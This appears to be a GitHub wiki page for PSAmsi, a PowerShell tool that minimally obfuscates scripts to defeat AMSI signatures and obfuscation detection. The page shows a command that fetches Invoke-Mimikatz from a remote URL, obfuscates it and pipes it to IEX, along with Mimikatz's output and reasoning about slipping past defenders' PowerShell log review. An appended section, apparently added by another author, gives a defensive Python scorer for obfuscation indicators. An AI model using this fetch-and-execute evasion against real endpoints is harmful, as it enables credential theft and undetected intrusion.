Defeating AMSI Signatures With Obfuscation

cobbr edited this page Sep 22, 2017 · 1 revision

We don't just want to find AMSI signatures, we want to defeat them! The primary function for obfuscating in PSAmsi is Get-MinimallyObfuscated.

Get-MinimallyObfuscated accepts a script using any one of the -ScriptString, -ScriptPath, -ScriptBlock, or -ScriptUri parameters and returns a minimally obfuscated copy of the script that will defeat AMSI signatures, as well as obfuscation detection.

```
PS > Get-MinimallyObfuscated -ScriptUri 'https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1' | IEX
PS > Invoke-Mimikatz -coMmANd Coffee

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # Coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'
```

Why minimal?

Why would we want to minimize obfuscation? Wouldn't it be better to obfuscate as much as possible to make sure we don't miss any AMSI signatures?

Well, yes and no. As defenders add PowerShell logging to their detection arsenal, obfuscated scripts stand out when those logs are reviewed. And if defenders are running any sort of obfuscation detection, they are certain to catch a script that has been obfuscated as heavily as possible.

But if our goal is just to remove those AMSI signatures hidden in our script, there really is no need to obfuscate so much that it could be detected. We only need to obfuscate those few AMSI signatures that are causing our script to be flagged. This is the approach taken by PSAmsi.
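To show the gap described above from the defender's side, here is an added example (not part of the PSAmsi wiki or project) that scores PowerShell script text, as it would appear in a script block log entry, for cheap textual obfuscation indicators. The sample scripts, indicator weights and threshold are my own assumptions, chosen to show how a minimally obfuscated command scores far lower than a heavily obfuscated one.

```python
import re

# Constructed sample script text as a defender would see it in script block logs.
SAMPLE_SCRIPTS = {
    "plain": "Invoke-Mimikatz -Command Coffee",
    # the minimally obfuscated form from this page: one mixed-case parameter name
    "minimal": "Invoke-Mimikatz -coMmANd Coffee",
    # constructed heavily obfuscated command: concatenation, a backtick split, call operator
    "heavy": "&('Get-'+'Pro'+'cess') -Na`mE ('exp'+'lorer')",
}

def case_transition_ratio(word):
    """Fraction of adjacent letter pairs whose case differs; PascalCase names stay low."""
    pairs = list(zip(word, word[1:]))
    if not pairs:
        return 0.0
    return sum(a.isupper() != b.isupper() for a, b in pairs) / len(pairs)

def obfuscation_indicators(script):
    """Count simple textual indicators of obfuscation in one PowerShell script."""
    words = re.findall(r"[A-Za-z]{3,}", script)
    return {
        # identifiers whose casing flips more than half the time, e.g. coMmANd or iEx
        "case_anomalies": sum(case_transition_ratio(w) > 0.5 for w in words),
        # a backtick splitting an identifier (skips the usual escape letters such as `n, `t)
        "backtick_splits": len(re.findall(r"`(?![0abefnrtuv])[A-Za-z]", script)),
        # quoted fragments joined with '+', which hides names from plain string matching
        "string_concats": len(re.findall(r"['\"]\s*\+\s*['\"]", script)),
        # call operator applied to a computed expression: &( ... )
        "dynamic_invokes": len(re.findall(r"&\s*\(", script)),
    }

# Assumed weights: structural tricks count double, each concatenation counts once.
WEIGHTS = {"case_anomalies": 2, "backtick_splits": 2, "string_concats": 1, "dynamic_invokes": 2}

def obfuscation_score(script):
    return sum(WEIGHTS[name] * count for name, count in obfuscation_indicators(script).items())

def is_obfuscated(script, threshold=4):
    """Naive alerting rule: flag a script once its weighted score reaches the threshold."""
    return obfuscation_score(script) >= threshold

if __name__ == "__main__":
    for name, text in SAMPLE_SCRIPTS.items():
        print(f"{name:8} score={obfuscation_score(text):2} flagged={is_obfuscated(text)}")
```

With these weights the page's minimally obfuscated command scores 2 and stays under the threshold while the heavy sample scores 7, which is exactly the blind spot a score-threshold detector leaves. A single casing anomaly in a parameter name is rare enough in legitimate scripts that it is worth a hunt query on its own.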
Credit - Under the hood, all PowerShell obfuscation in PSAmsi uses Invoke-Obfuscation written by Daniel Bohannon.